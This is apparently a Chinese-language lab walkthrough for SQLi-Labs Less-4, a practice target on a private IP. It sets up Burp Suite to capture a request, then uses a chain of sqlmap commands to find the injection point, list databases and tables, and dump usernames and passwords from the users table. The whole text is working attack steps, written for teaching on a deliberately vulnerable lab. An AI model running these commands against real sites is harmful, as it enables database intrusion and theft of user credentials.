1.访问SQLi-Labs网站
访问Less-4
http://192.168.5.116/sqli-labs/Less-4/
2.利用Burpsuite工具抓包
1)启动Burpsuite并设置代理服务端口
2)设置Firefox代理
注意:端口要一致
3)开启 Burpsuite的代理拦截功能
4)利用Burpsuite工具拦截HTTP请求包
在Firefox地址栏中给定一个GET参数,并访问
http://192.168.5.116/sqli-labs/Less-4/?id=1
此时,Burpsuite会拦截到HTTP请求包,将请求包内容拷贝至D:\1.txt中
3.启动SQLMAP
进入sqlmap目录,在搜索框输入cmd,并回车
4.寻找注入点
python sqlmap.py -r D:\1.txt
检测结果:
5.获取所有数据库的库名
1)获取所有数据库的库名
python sqlmap.py -r D:\1.txt --dbs
2)获取当前数据库的库名
python sqlmap.py -r D:\1.txt --current-db
5.获取security数据库中的所有表名
python sqlmap.py -r D:\1.txt -D security --tables
其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。
6.获取users表的全部字段名
python sqlmap.py -r D:\1.txt -D security -T users --columns
7.获取users表id,username和password字段的全部值
python sqlmap.py -r D:\1.txt -D security -T users -C id,username,password --dump